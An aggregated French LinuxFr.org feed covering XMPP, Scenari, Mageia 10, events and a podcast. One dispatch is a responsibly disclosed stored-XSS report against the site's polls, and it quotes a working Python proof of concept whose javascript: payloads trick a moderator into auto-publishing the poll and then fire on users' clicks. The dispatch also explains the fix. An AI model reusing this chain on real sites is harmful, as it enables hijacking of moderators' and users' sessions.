- Français: Adrien Bourmault (neox), anubis, seveso, impromptux
- Italien: Mario Sabatino, Roberto Resoli
- Portugais: Paulo
Cette lettre d'information XMPP est produite en collaboration avec la communauté XMPP. Chaque numéro mensuel est rédigé dans ce simple pad. À la fin de chaque mois, le contenu du pad est fusionné dans le dépôt GitHub de la XSF. Nous sommes toujours ravis d'accueillir de nouvelles personnes contributrices. N'hésitez pas à rejoindre la discussion dans notre groupe de discussion Comm-Team (MUC) et à nous aider ainsi à poursuivre cet effort communautaire. Vous avez un projet et souhaitez le faire connaître ? N'hésitez pas à partager vos actualités ou événements ici, et à les promouvoir auprès d'un large public.
Tâches que nous effectuons régulièrement :
- collecte d'actualités dans l'univers XMPP
- résumés courts d'actualités et d'événements
- résumé de la communication mensuelle sur les extensions (XEP)
- révision du projet de lettre d'information
- préparation d'images pour les médias
- traductions
- communication via les comptes des médias
Cette lettre d'information est publiée sous licence CC BY-SA.
Télécharger ce contenu au format EPUBCommentaires : voir le flux Atom ouvrir dans le navigateur
Portrait d’un membre de la communauté Scenari : Yves Vandermeer (ECTEG)
Scenari est un ensemble de logiciels open source dédiés à la production collaborative, publication et diffusion de documents multi-support (Opale pour la formation, Dokiel pour la documentation, Optim pour les présentations génériques, Topaze pour les études de cas, Parcours pour créer des scénarios de formation, etc.)
Aujourd’hui nous échangeons avec Yves vandermeer, basé en Belgique, coordinateur de l’European Cybercrime Training and Éducation Group (ECTEG).
ECTEG est une association internationale sans but lucratif (AISBL), qui regroupe des services de police des États membres de l’Union européenne et de l’Espace économique européen ainsi que des organismes internationaux, des universités, des entreprises du secteur privé et des experts.
Financés par des fonds de la Commission européenne, l’ECTEG développe des formations en cyber-criminalité et analyse technico-légale des traces informatiques mises à la disposition des entités de police et des magistrats des États Membres et au-delà, par nos partenariats avec Europol, Interpol, l’OSCE, UNODC et le Conseil de l’Europe.
- lien nᵒ 1 : Scenari
- lien nᵒ 2 : ECTEG
- lien nᵒ 3 : Topaze
- lien nᵒ 4 : Dokiel
- lien nᵒ 5 : Association Scenari
- lien nᵒ 6 : Kelis
Début 2017, à la création d’ECTEG, j’étais à la recherche d’un outil de développement de contenus de formation interactifs et collaboratifs. Par de la veille et des recherches sur internet, j’ai découvert Scenari et sa communauté. Rapidement, une première formation interactive a été développée et mise à la disposition des forces de police européennes.
Actuellement vous utilisez quels modèles Scenari et pourquoi ?Nous avons à présent migré la presque totalité de nos formations en ligne et en présentiel sur Scenari, pour lesquelles nous utilisons Topaze pour créer des jeux sérieux et Dokiel en version anglaise. Notre expérience en Topaze a été présentée lors des Rencontres Scenari 2020.
L’utilisation de Dokiel permet de développer des cours en ligne qui préparent aux cours en présentiel. Lors de ces cours des labos pratiques sont communiqués aux participants, souvent en PDF et les solutions ensuite revues en mode “diapositives”.
Une utilisation spécifique de Dokiel a également permis de rédiger les scripts et la documentation de deux scenarios réalistes pour lesquels les traces ont été enregistrées en temps réel, permettant ainsi de développer des exercices qui ressemblent à des enquêtes réelles. L’utilisation des variables, par exemple, a permis de rédiger le script en ignorant le numéro de la plaque minéralogique de la voiture des suspects. Mise à jour au moment du tournage, cette variable a permis de créer une documentation précise et complète du matériel ainsi créé.
Avec plus de quatre-vingts experts travaillant à distance depuis différents pays européens, les fonctionnalités collaboratives de Scenari se sont révélées uniques, et les évolutions du cœur et des différents modèles apportent toujours de nouvelles réponses aux besoins pédagogiques.
Y a-t-il des fonctionnalités transverses de Scenari que vous utilisez à l’ECTEG ?Nous utilisons les ateliers dérivés pour permettre les traductions de contenu, désormais assistées par une IA interne, mais aussi pour les localiser afin de s’adapter aux législations et pratiques qui différent pays à l’autre et pour certains cours sur d’autres continents. À titre d’exemples, un cours sur l’analyse des virus informatiques a récemment été traduit en espagnol pour former les spécialistes en Amérique du Sud et une version modifiée d’une autre formation adaptée pour la formation des autorité judiciaires, procureurs et juges.
Quelle est votre implication dans la communauté ?Après une petite dizaine d’années d’utilisation de Scenari, il est devenu l’un de nos outils principaux et nous travaillons, avec l’aide de l’Association Scenari et de Kelis, au développement de nouvelles fonctionnalités pour répondre aux besoins exprimés par les utilisateurs et faciliter le déploiement des formations dans l’Union européenne et dans des pays tiers, bien sûr en Ukraine mais également en Asie et en Amérique du Sud.
Quels projets avec Scenari prévoyez-vous dans le futur ?Ajouter la réalité virtuelle et améliorer l’intégration des cours développés sur des plateformes de formation comme Moodle sont quelques-uns de nos projets pour les mois à venir. Il est aussi important que ces développements soient mis à la disposition de la communauté Scenari.
À combien estimes-tu le nombre de personnes ayant consulté vos productions faites avec Scenari ?Une de nos formations, entièrement en ligne et interactive qui comporte à ce jour six jeux sérieux est développée par une trentaine de policiers experts, cinq procureurs et une juge d’instruction. L’équipe interne d’ECTEG apporte son soutien pour les fonctionnalités avancées et la cohérence pédagogique. Ce cours a permis de former environ 1500 premiers intervenants mais s’implémente petit à petit dans les différents pays. Pour d’autres cours, techniquement plus avancés, environ 500 praticiens en analyse technico-légale les ont déjà suivis. Ce n’est qu’un début, pour la formation destinée aux premiers intervenants le public visé en Europe est de plus d’un demi-million de policiers, dès qu’elle sera disponible dans chacune des langues officielles.
Merci Yves !
Télécharger ce contenu au format EPUBCommentaires : voir le flux Atom ouvrir dans le navigateur
Open Source Experience 2026 : appel à stands et retour sur l’édition 2025 #OSXP2026
Après le palais des congrès et la Cité des Sciences et de l’Industrie, Open Source Experience déménage cette année à la porte de Versailles (toujours à Paris donc) et se tiendra les 9 et 10 décembre 2026. Cela nous permettra de nouveau d’avoir quelques stands de plus pour le village associatif !
D’ailleurs, l’appel à stands est ouvert et n’attend plus que votre candidature.
En attendant, vous trouverez un petit retour sur cette cinquième édition qui s’est tenue les 10 et 11 décembre derniers, à la Cité des Sciences et de l’Industrie. L’événement était de nouveau couplé à DevOpsREX et ce duo d’événements colocalisés semble bien fonctionner. Encore une fois, nous étions là pour vous rencontrer, interagir avec la communauté et vous faire plaisir !
- lien nᵒ 1 : Demandez votre stand sur le village pour Open Source Experience
- lien nᵒ 2 : Un stand pour ceux qui ont des sous
- lien nᵒ 3 : Site web d'Open Source Experience
- lien nᵒ 4 : Revisionnez l'Associal Club, le temps fort associatif de 2025
Revue de presse de l’April pour la semaine 27 de l’année 2026
Cette revue de presse sur Internet fait partie du travail de veille mené par l’April dans le cadre de son action de défense et de promotion du logiciel libre. Les positions exposées dans les articles sont celles de leurs auteurs et ne rejoignent pas forcément celles de l’April.
- [Les Numeriques] “J'ai voulu créer une app gratuite, open source et respectueuse de la vie privée”: Saracroche, le logiciel qui veut mettre fin aux démarchages téléphoniquess
- [The Conversation] Abondance, rareté, open source: et si le débat sur l'IA se trompait d'étage?
- [Goodtech] Conformité au CRA: l'écosystème open source se dote d'une formation gratuite
- [Le Monde Informatique] Comment l'Éducation nationale a construit le cloud Nuage pour le partage de fichiers
- [Numerama] Godot interdit le code généré par IA dans son moteur open source
- [ZDNET] Libre et open source express: Europe numérique, le pape et le Libre, communautés toxiques, Wikipédia
- [Silicon.fr] Comment l'UE se représente l'open source en France
- [ZDNET] La souveraineté numérique à l'ONU: au cœur de la dynamique mondiale pour remplacer les géants américains par des technologies open source
- [ZDNET] 'La mutualisation, ça marche à fond!' L'Adullact, le logiciel libre au service des collectivités
- lien nᵒ 1 : April
- lien nᵒ 2 : Revue de presse de l'April
- lien nᵒ 3 : Revue de presse de la semaine précédente
- lien nᵒ 4 :
Agenda du Libre pour la semaine 28 de l'année 2026
Calendrier Web, regroupant des événements liés au Libre (logiciel, salon, atelier, install party, conférence), annoncés par leurs organisateurs. Voici un récapitulatif de la semaine à venir. Le détail de chacun de ces 30 événements (France: 25, Belgique: 2, Internet: 2, Québec: 1) est en seconde partie de dépêche.
- lien nᵒ 1 : April
- lien nᵒ 2 : Agenda du Libre
- lien nᵒ 3 : Carte des événements
- lien nᵒ 4 : Proposer un événement
- lien nᵒ 5 : Annuaire des organisations
- lien nᵒ 6 : Agenda de la semaine précédente
- lien nᵒ 7 : Agenda du Libre Québec
-
- [FR Saint Clar] Tous les Lundis, médiatheque de Saint Clar – Le lundi 6 juillet 2026 de 10h00 à 17h00.
- [FR Saint-Étienne] Permanence de l’association Alolise – Le lundi 6 juillet 2026 de 19h00 à 22h00.
- [FR Sainte-Hélène] Cours gratuits d’Espéranto + Visio – Le lundi 6 juillet 2026 de 19h30 à 21h30.
- [FR Saint-Herblain] Repair Café numérique + Install Party – Le mardi 7 juillet 2026 de 14h00 à 17h00.
- [FR Dijon] Atelier du mardi – Le mardi 7 juillet 2026 de 15h00 à 19h00.
- [CA-QC Montréal] Rencontres Linux au Québec – Le mardi 7 juillet 2026 de 17h00 à 21h30.
- [FR Lyon] Polar en Vacances, 11ᵉ édition – Du mercredi 8 juillet 2026 à 13h00 au jeudi 9 juillet 2026 à 09h00.
- [FR Fourmies] La permanence du libre – Le mercredi 8 juillet 2026 de 13h30 à 17h00.
- [FR Nantes] Repair Café numérique + Install Party – Le mercredi 8 juillet 2026 de 14h00 à 18h00.
- [FR Gond-Pontouvre] Permanence du mercredi – Le mercredi 8 juillet 2026 de 14h00 à 18h00.
- [FR Muzillac] Formation : Maîtriser un gestionnaire de mots de passe – Le mercredi 8 juillet 2026 de 16h00 à 18h00.
- [FR Marseille] Réunion d’information. Installation Linux – Le mercredi 8 juillet 2026 de 18h00 à 19h00.
- [FR Lyon] Réunion mensuelle – Le mercredi 8 juillet 2026 de 19h00 à 22h00.
- [FR Bordeaux] Cours gratuits d’Espéranto – Le mercredi 8 juillet 2026 de 20h00 à 22h00.
- [Internet] Mini-webinaire Scenari : L’après-Canoprof : des solutions pour utiliser ses contenus au-delà du 31 juillet 2026 – Le jeudi 9 juillet 2026 de 15h30 à 16h30.
- [BE Lessines] Atelier les co-libristes – Le jeudi 9 juillet 2026 de 18h00 à 21h30.
- [FR Romans-Sur-Isere] Install Party Linux – Le jeudi 9 juillet 2026 de 18h00 à 22h00.
- [BE Huy] Réunion mensuelle LiHuy – Le jeudi 9 juillet 2026 de 19h30 à 22h30.
- [FR Quimperlé] Point info GNU/Linux – Le vendredi 10 juillet 2026 de 13h30 à 17h30.
- [FR Nantes] Repair Café numérique + Install Party – Le vendredi 10 juillet 2026 de 14h00 à 17h00.
- [FR Brest] Atelier d’été – LAN Jeux Vidéo Libres – Le vendredi 10 juillet 2026 de 14h00 à 17h00.
- [FR Le Tholonet (Palette)] Réunion mensuelle de l’Axul – Le vendredi 10 juillet 2026 de 20h00 à 23h00.
- [Internet] Pause Café Linux : Votre rendez-vous hebdomadaire – Le vendredi 10 juillet 2026 de 11h45 à 13h00.
- [FR Amancy] Rencontre « Logiciels Libres » – Le samedi 11 juillet 2026 de 09h00 à 12h00.
- [FR Chaumont] Permanence Informatique – Le samedi 11 juillet 2026 de 09h00 à 12h00.
- [FR Montpellier] Rencontre | Pique-nique du Libre – Le samedi 11 juillet 2026 de 17h00 à 19h00.
- [FR Montpellier] Rencontre | Wiknic – Le samedi 11 juillet 2026 de 19h00 à 21h00.
- [FR Redon] Install Party – Le dimanche 12 juillet 2026 de 14h00 à 18h00.
- [FR Redon] Install Party Linux – Le dimanche 12 juillet 2026 de 14h00 à 18h00.
- [FR Béziers] Rencontre | Pique-nique du Libre – Le dimanche 12 juillet 2026 de 17h00 à 19h00.
Tous les lundis de 10h à 17h sans interruption, l’association Prends-toi en main / atelier abcpc, propose install party, suivi, dépannage, formation et revalorisation à petit prix sous Linux exclusivement.
L’atelier abcpc existe depuis plus de 10 ans et milite exclusivement pour les logiciels libres.
- Médiatheque, Médiatheque, 4 place Dastros, Saint Clar, Occitanie, France
- https://www.facebook.com/PrendsToiEnMain
- linux, permanence, dépannage, formation, adieu-windows, libres, logiciels-libres, abcpc, prends-toi-en-main, install-party
Tous les lundis soir de 19h à 22h (hors jours fériés) à la Bricoleuse.
Rencontrer les bénévoles, poser des questions sur le libre ou l’informatique, les logiciels, l’hébergement, passer de Windows à Linux.
Pour passer votre ordinateur sous Linux, nous vous invitons à nous prévenir avant votre passage: contact@alolise.org.
- La Bricoleuse, La Bricoleuse, 27 rue de la Ville, Saint-Étienne, Auvergne-Rhône-Alpes, France
- https://alolise.org
- install-party, aide, logiciel-libre, entraide, alolise, permanence, linux, gnu-linux
Saluton,
Je vous propose des cours d’espéranto gratuits qui débuteront le lundi 8 juin à Sainte-Hélène dans le Médoc et qui sera également disponible en visioconférence.
Le cours est destiné aux apprenants francophones de France et d’ailleurs.
L’espéranto est plus qu’une langue neutre et très facile, mais aussi une langue fraternelle et libre qui permet de voyager dans de nombreux pays avec des facilités d’hébergement ou de fraterniser avec des personnes du monde entier.
Vous trouverez plus d’informations sur la page Wikipédia, le site Espéranto-Gironde ou en visualisant le documentaire "ESPÉRANTO: de la genèse à la conquête de l’Europe"
Les cours ont lieu le lundi soir de 19h30 à 21h30 sur environ 10 soirs pour réaliser les 10 leçons. Ces leçons complèteront les cours papier ou d’application telle que Duolingo.
Début: lundi 8 juin 2026.
Les cours sont GRATUITS pour tous.
Le cours est en présentiel à Sainte-Hélène (33480) au foyer des sociétés en collaboration avec l’association l’Écurieux, ainsi qu’en distanciel / visioconférence.
Ce cours est gratuit pour tous, en présentiel ou en distanciel.
Nous pourrons organiser à la suite du cours, des rencontres avec les espérantistes de Bordeaux, du pays basque… afin de pratiquer en situation réelle.
N’hésitez pas à nous contacter par téléphone au 0688350981 (appel, SMS, Signal) pour plus d’informations ou pour vous inscrire.
Vivu Esperanto kaj Ĝis la revido.
- Foyer des sociétés, Foyer des sociétés, allée du Stade, Sainte-Hélène, Nouvelle-Aquitaine, France
- espéranto, langue-libre, langue, visio
Un ordinateur qui rame, qui refuse de démarrer ou qui est cassé, venez le réparer en notre compagnie.
Marre de Windows et envie d’un peu de liberté, venez le libérer!
- Centre socioculturel du sillon de Bretagne, Centre socioculturel du sillon de Bretagne, 12 bis avenue des Thébaudières, Saint-Herblain, Pays de la Loire, France
- https://www.alamaisondulibre.org
- recyclage, repair-café, atelier, install-party, linux, logiciels-libres, gnu-linux, windows10, a-la-maison-du-libre, adieu-windows
Présentation de différents outils concernant les logiciels libres.
Assistance technique.
De préférence sur RDV directement sur le site de l’asso
- Maison des associations, Maison des associations, 2 rue des Corroyeurs, Dijon, Bourgogne-Franche-Comté, France
- https://desobs.fr
- informatique-libre, installation, réemploi, réparation, résilience, résoudre, atelier, desobsolescence, adieu-windows
Local de la rencontre: École de Technologie Supérieure local B-0904
Rencontre virtuelle: Suivez le lien sur la page de l’événement
17:00 à 19:00 – 5 à 7 virtuel et en présentiel
Rejoignez-nous pour un moment de détente et de convivialité lors de notre 5 à 7. Que vous préfériez nous retrouver au Resto-Pub 100 Génies de l’ÉTS ou en ligne sur BigBlueButton (BBB), l’essentiel est de partager un moment agréable. Si vous avez l’intention de venir en personne, veuillez nous en informer afin de pouvoir réserver suffisamment de place pour vous.
18:30 à 19:00 – Installation et tests de l’environnement hybride (tests de son et vidéo)
Nous assurerons que l’environnement hybride soit parfaitement opérationnel en effectuant des tests de son et de vidéo.
19:00 à 21:30 – Programmation de la rencontre
- Accueil et mot de bienvenue Martial Bigras
- Capsule éducative: L’objection-sociocratique comme core de gouvernance léger pour les petites communautés open source. Par Jérémy Viau-Trudel
Jérémy viendra vulgariser et partager le résultat de 27 ans en recherche-action sur les communautés de pratiques ouvertes, de développement libre et open source.
Pas de blabla inutile: un format court, dense et accessible pour comprendre les clés d’une gouvernance collaborative efficace.
Une courte présentation inspirante à ne pas manquer pour tous les passionnés de l’écosystème libre.
XSS sur le site linuxfr.org (pas très grave à mon avis)
Ce titre est celui d’un courriel reçu le samedi 20 juin 2026 en fin de soirée. La France est alors au milieu de sa deuxième canicule de l’année, et moi en train de produire la dépêche De la fermeture des comptes inactifs depuis 3 ans que je pensais initialement en avance et qui était finalement en retard.
Et donc recevoir un tel message n’annonçait rien de bien rafraîchissant. (Même si ça changeait des week-ends successifs d’annonces de failles de sécurité noyau à déployer plus ou moins en urgence)
Pourtant il s’agissait du signalement d’une faille réelle, fait de façon détaillée, claire et pédagogique. Ça change du bruit de fond habituel sur Internet avec son lot de tentatives diverses et variées d’injections chimériques mi-SQL mi-Javascript mi-PHP, et ses fameux audits de sécurité non-sollicités et délicieusement bourrins. Grand merci donc à 0xMitsurugi H pour avoir explicité le problème.
- lien nᵒ 1 : (RMLL 2009) Retour d'expérience sécurité sur 11 ans de LinuxFr.org
- lien nᵒ 2 : Les sondages sur LinuxFr.org
(avec l’autorisation de l’auteur « mon code et le rapport sont open source »)
Bonjour, J’ai lu le code source de linuxfr.org et je me suis intéressé aux sondages. J’ai l’impression que certains échappements HTML ne fonctionnent pas très bien. Il est possible de bypasser la regexp dans les réponses du sondage et injecter du javascript dans les réponses. En soi, ce ne serait pas grave, car un sondage doit être validé par un admin pour que les utilisateurs le voient. L’astuce ici consiste à utiliser une réponse avec du js qui fera valider automatiquement le sondage par un admin, et mettre un second javascript dans une autre réponse destiné aux utilisateurs, une fois le sondage validé, permettant la compromission de tous les utilisateurs qui vont cliquer sur le sondage. Voici le poc en python (inliné dans le mail car google fait des dingueries avec les pièces jointes en python): #!/usr/bin/env python3 r""" PoC — XSS stockee via linkify dans les reponses de sondage linuxfr.org Vecteur : href="javascript:..." active au clic Bypass regex : tagged template ` func`arg` ` au lieu de func('arg') - document.querySelector`.ok_button` au lieu de document.querySelector('.ok_button') - form.submit`` au lieu de form.submit() - alert`msg` au lieu de alert('msg') Aucune parenthese `)` n'apparait dans l'URL markdown, donc la regex \[([^\]]*)\]\(([^)]*)\) ne peut rien manger. Contrainte : 128 caracteres max (PollAnswer) Phase 1 : 64 car. (form.submit pour auto-publication) Phase 2 : 54 car. (alert de preuve) Deroulement : 1. Attaquant cree un sondage avec les payloads XSS 2. Moderateuur visite /moderation/sondages/ID et clique sur [a] 3. La publication se fait sans boite de confirmation 4. Les visiteurs cliquent sur [b] -> alerte JavaScript Usage : python3 poc.py <url> <user_session> <url> : racine du site (ex: http://dlfp.lo) <user_session> : valeur du cookie linuxfr.org_session (compte standard) Exemple : python3 poc.py http://dlfp.lo "user_session_value" Prerequis : pip install requests """ import re import sys from urllib.parse import urljoin, urlparse import requests def e(msg: str, code: int = 1) -> None: print(f"[-] {msg}") sys.exit(code) def s(msg: str) -> None: print(f"[+] {msg}") def info(msg: str) -> None: print(f"[*] {msg}") def banner() -> None: print("=" * 68) print(" PoC — XSS linkify -> Auto-validation + XSS proof") print(" Vecteur : tagged templates dans href (pas de ) necessaire)") print(" Cible : linuxfr.org") print("=" * 68) def make_session(cookie_value: str, target_url: str) -> requests.Session: s = requests.Session() hostname = urlparse(target_url).hostname s.cookies.set("linuxfr.org_session", cookie_value, domain=hostname) return s def create_poll(url: str, session: requests.Session,) -> tuple[str, str]: """ Cree un sondage avec les reponses malveillantes. """ # Réponse 1 : 64 car. — form.submit() via tagged template # document.querySelector`.ok_button` => querySelector('.ok_button') # form.submit`` => form.submit() payload_phase1 = ( "[a]" "(javascript:document.querySelector" "`.ok_button`.form.submit``)" ) # Réponse 2 : 54 car. — alert via tagged template payload_phase2 = ( "[b]" "(javascript:alert" "`smile this is your favorite XSS`)" ) info("Chargement du formulaire de creation...") r = session.get(urljoin(url, "/sondages/nouveau")) csrf = re.search( r'name="authenticity_token" value="([^"]*)"', r.text ) csrf = csrf.group(1) info("Creation du sondage malveillant...") r = session.post(urljoin(url, "/sondages"), data={ "authenticity_token": csrf, "poll[title]": "PoC XSS — tagged template", "poll[wiki_explanations]": ( "Cliquez sur les liens ci-dessous !" ), "poll[cc_licensed]": "1", "poll[answers_attributes][0][answer]": payload_phase1, "poll[answers_attributes][1][answer]": payload_phase2, }) if r.status_code not in (200, 302): e(f"Creation echouee (HTTP {r.status_code})") print("Connectez vous en tant qu'admin et cliquez sur la réponse A") def main(): banner() if len(sys.argv) != 3: print(f"Usage: {sys.argv[0]} <url> <user_session>") print() print("Exemple :") print(f' {sys.argv[0]} http://dlfp.lo "SESSION_USER"') sys.exit(1) target_url = sys.argv[1].rstrip("/") user_session_val = sys.argv[2] user_session = make_session(user_session_val, target_url) # Creation du sondage malveillant print() info("Creation du sondage avec payloads XSS") create_poll(target_url, user_session) if __name__ == "__main__": main() Et je joins les copies d’écran dans l’ordre :-) C’était sympa à trigger, je ne pensais pas arriver à quelque chose avec l’autovalidation de l’admin pour publier le sondage. Bon, il faut quand même l’interaction d’un admin (d’où le fait que ce n’est pas très grave), j’ai essayé des trucs à base de onmouseover, mais je n’arrive à rien de bien ce soir, il fait trop chaud. Merci de gérer et maintenir le site linuxfr, j’ai appris beaucoup de choses en le lisant, même si je ne suis qu’un simple lecteur :-) Merci de fournir le code source sur github, ça m’a permis de debug en live mes tests. Bonne soirée Et paf le PoC !Les cinq images étaient en pièces jointes du signalement.
La démonstration à l’œuvre :
En admin, le nouveau sondage dans la page des sondages :
En admin, cliquer sur un choix autovalide le sondage :
Et sur le sondage publié, un clic d’un compte utilisateur :
Paf la faille :
Un peu de contexteLa faille signalée concerne le type de contenu sondages du site LinuxFr.org : un sondage est une question sur un thème donné ; le lectorat du site LinuxFr.org peut choisir parmi un ensemble de réponses proposées. (aide)
Une personne ayant un compte sur le site peut proposer un sondage (aide). Sa publication nécessite une approbation par l’équipe de modération (aide).
Un sondage est composé d’une partie question en Markdown. Et de (en général) plusieurs réponses dans un format exotique : c’est du texte brut, pas de mises en forme en italique/gras ou autre, sauf que les liens au format Markdown [oh un lien](https://une.adresse.invalid) sont possibles, depuis 2012. Ce code pour gérer du supposé texte brut mais acceptant des hyperliens Markdown, avec une expression rationnelle pour gérer, forcément ça annonçait un hypothétique problème à venir.
« Le cross-site scripting (abrégé XSS) est un type de faille de sécurité des sites web permettant d'injecter du contenu dans une page, provoquant ainsi des actions sur les navigateurs web visitant la page. » (Wikipedia) : ici on va glisser un sondage malveillant dans la base de données LinuxFr.org, une personne modératrice va aller le lire et déclencher involontairement la publication, qui devient alors visible par tout le monde, et chaque personne qui ira voter sur le sondage va déclencher un comportement non désiré. Bon en pratique, à ce moment là, ladite personne modératrice se rendrait alors compte du problème et dépublierait le sondage en catastrophe. Potentiellement trop tard pour quelques personnes du lectorat avides de sondages.
Une vraie failleBon si ça se trouve, la faille ne fonctionne pas, c’est facile de tester et de voir si on reproduit. Bon on reproduit…
En analysant le code et en testant, on voit qu’il y a plusieurs soucis :
- on peut insérer en base de données des choses que l’on ne voudrait pas y voir ;
- on peut afficher ce qu’on a trouvé en base en filtrant mal.
Donc on va ajouter un filtrage à la création sur les hyperliens pour ne laisser passer que les protocoles autorisés et que des adresses qui ressemblent à des adresses.
Et on va ajouter un filtrage à l’affichage / conversion en HTML pour n’afficher que des hyperliens, dans les protocoles autorisés et avec une adresse qui ressemble à une adresse.
Évidemment il y a la contrainte de ne pas casser le fonctionnel et les sondages déjà présents en base de données.
Donc on fait plein de tests un peu cracra :
Et on produit un commit de correction (si tout va bien).
On a aussi vérifié le contenu existant de la base, au cas où.
Il ne restait plus qu’à remercier le contributeur et à convenir d’une publication en dépêche. Que voici.
ConclusionUne contribution par une personne qui a lu le code source, qui a déployé le site, qui a écrit un bout de code pour illustrer l’exploitation de la faille de bout-en-bout, qui a littéralement illustré l’exploitation avec cinq images et qui a accompagné le tout d’une explication détaillée et en fournissant le code. Que demander de plus ? Encore merci.
Ah oui il faut une ouverture finale et tenir en haleine le lectorat : cette dépêche n'évoque pas la dernière faille signalée (ni même l'avant-dernière), et on n'est que douze jours après.
Télécharger ce contenu au format EPUBCommentaires : voir le flux Atom ouvrir dans le navigateur
Mageia 10 : le manchot sort du chaudron !
La nouvelle mouture de la distribution Linux communautaire Mageia est disponible : la version 10 fait sortir le manchot du chaudron ! Les personnes connaissant la distribution comprendront l’allusion ;-) Cauldron — le chaudron — étant la version de développement, il est naturel d’en obtenir une version installable stabilisée périodiquement.
À vos téléchargements pour utiliser cette nouvelle mouture.
- lien nᵒ 1 : Site web officiel de Mageia
- lien nᵒ 2 : Télécharger Mageia 10
- lien nᵒ 3 : Notes de version de Mageia 10
- lien nᵒ 4 : Soutien de nos amis de MageiaLinux-online
- lien nᵒ 5 : Annonce de la sortie de Mageia 10
Cette version 10 de Mageia marque les 16 ans du lancement de la distribution (septembre 2010), elle s’inscrit dans la continuité de Mageia 9 qui nous a accompagnés et a évolué depuis plus de 2 ans et ½ ;-)
Versions disponiblesMageia 10 est classiquement proposée à l’installation avec différents choix :
- image ISO Live avec Plasma/KDE, GNOME seulement en x86_64, XFCE en x86_64 et i686 ;
- image de DVD/clé USB d’installation (plus) complète en x86_64 et i686 avec choix du bureau ou serveur ;
- image d’installation réseau en x86_64 et i686, permettant une installation minimaliste ou plus complète avec les méta-paquets task- (plasma, gnome, lxqt, lamp-php, edu, astronomy…).
Mises à jour des environnements de bureau
- Plasma KDE 6.5.5
- GNOME 49
- XFCE 4.20
- ainsi que Cinnamon, Enlightenment, LXDE, LxQt, MATE et quelques window managers FVWM (2 & 3), swm, twm, WindowMaker, xfwm… ainsi que quelques compositeurs Wayland comme hyprland, sway…
Au niveau des logiciels, GIMP 3.2.4 (GIMP 2.10 n’est plus disponible, mais à qui va-t-il manquer ?), FreeCAD 1.1.1, Inkscape 1.4.4, Mathmod 13.0…
Points marquantsMageia 10 est sans doute la dernière version à proposer Plasma 6.5.5 et GNOME 49 pour X11. En effet, la version suivante GNOME 50 sortie récemment commence les travaux de suppression de la prise en charge de X.org : c’est Wayland qui est désormais standard. Ceci explique certainement le fait que Mageia fait le choix de ne pas passer vers Gnome 50.
Concernant l’architecture 32 bits, ses jours^W mois sont sans doute comptés aussi : c’est i686 qui est encore proposé à l’installation (et non plus i586). Dommage pour les EeePC avec les processeurs Intel Atom N270 (déjà que la résolution d’écran de 1024x600 n’aidait pas trop :/). Pour les jeux, Wine 11.0 est fourni avec Wine-Wow64, permettant de bénéficier de meilleures performances et de faire fonctionner des applications et jeux 32 bits sans paquets dédiés 32 bits, ce qui évite d’avoir à activer les dépôts 32 bits sur une distribution x86_64.
Lors du cycle de publication de Mageia 10, des failles critiques du noyau Linux ont été prises en compte : CopyFail (CVE-2026-31431) par fourniture du noyau 6.18.22 et suivants incluant les correctifs, puis DirtyFrag (CVE-2026-46300, mise à jour noyau), puis Fragnesia (CVE-2026-46300), puis vulnérabilité dans ptrace (CVE-2026-46333, mise à jour noyau 6.18.30 avec patch pour get_dumpable dans ptrace, le noyau 6.18.31 incluant déjà le patch). Les mises à jour correspondantes pour le noyau 6.6.x LTS de Mageia 9 ont aussi été proposées, elles sont tracées dans les advisories Mageia MGASA- lorsque suivies par l’équipe sécurité et dans le changelog du noyau (urpmq - i --changelog kernel-desktop-latest) lorsqu’un patch est spécifiquement appliqué (sinon voir le changelog de la version officielle du noyau).
Montées de versions successives de Firefox 140.6 à 140.11 LTS : consommation mémoire améliorée ?
Le paquet chromium-browser-stable 136 a été le dernier fourni en Mageia 9 et a dû être abandonné par manque de mainteneur pour Mageia 10 : l’installation peut être effectuée via flatpak ou passer au paquet RPM de Chrome disponible chez Google. Si un nouveau mainteneur se manifeste, il pourrait redevenir disponible pour Mageia 10 via les updates, avis aux personnes motivées à devenir empaqueteur _o/ (même si ce n’est clairement pas le paquet le plus simple pour commencer).
En contrepartie, des navigateurs pour le protocole Gemini ont été ajoutés : Lagrange (SDL), Kristall (Qt), Offpunk (CLI).
Jeux et autres logiciels (liste non exhaustive)0ad 0.28 a été actualisé à la version « Bolorix ».
Flightgear en version 2024.1.5 un simulateur de vol ayant ses fans sur MLO (plus de 586 pages dans le fil du forum jeux).
Rocks 'n Diamonds est en version 4.4.1.2 (et a plus de 30 ans !)
Audacity en version 3.7.7 — la 3.7.8 étant sortie après la rc1, à voir si elle fera son chemin dans les updates — pour profiter des greffons Tempo tracks, LADSPA, et analyseur Vamp tant qu’ils sont encore disponibles.
FreeCAD 1.1.1 pour la modélisation 3D en fablab intégré lors du cycle de bêta de Mageia 10 (Mars 2026) sera la dernière suivant cette numérotation, le choix du passage à CalVer étant entériné
Inkscape 1.4.4 pour avoir une version de maintenance de la branche 1.4.x à jour apportant moins de plantages et plus de performances.
LibreOffice 26.2.3.2 la suite de bureau, à voir si la prochaine version à venir 26.8 sera ajoutée dans les updates pour la rentrée des classes ;-)
Les paquets pour le serveur et le client Nextcloud en version 32 font leur retour avec Mageia 10.
Communauté et contributionsPrésent avec un stand à Capitole du libre en novembre 2025, au PSL XXL et visite à l’OSXP en décembre 2025, JDLL fin mai 2026.
Nos amis de MageiaLinux-Online (MLO) sont toujours de la partie _o/ Tutoriels et forums en français vous accueillent. Rendez-vous à la rentrée pour install'parties et événements du Libre ;-)
Télécharger ce contenu au format EPUBCommentaires : voir le flux Atom ouvrir dans le navigateur
Podcast Projets Libres saison 4 épisode 19 : surveiller les grandes plateformes grâce à Open Terms Archive
Comment rendre plus transparents les changements des conditions d'utilisation des grands services numériques ?
Pour ce nouvel épisode sur les communs numériques, nous partons à la découverte d'Open Terms Archive !
Open Terms Archive permet de suivre et alerter des changements qui se cachent dans ces documents peu compréhensibles.
Avec Sydney Wheeler et Matti Schneider nous revenons sur :
- la genèse du projet
- sa gouvernance et sa communauté
- son fonctionnement
- ses défis de structuration après sa phase d'incubation au sein du ministère des affaires étrangères jusqu'à janvier 2026
- son utilisation en dehors de la France
- lien nᵒ 1 : Lien de l'épisode
- lien nᵒ 2 : Le site d'Open Terms Archive
- lien nᵒ 3 : La traduction anglaise de l'épisode
- lien nᵒ 4 : Soutenir le podcast
Commentaires : voir le flux Atom ouvrir dans le navigateur










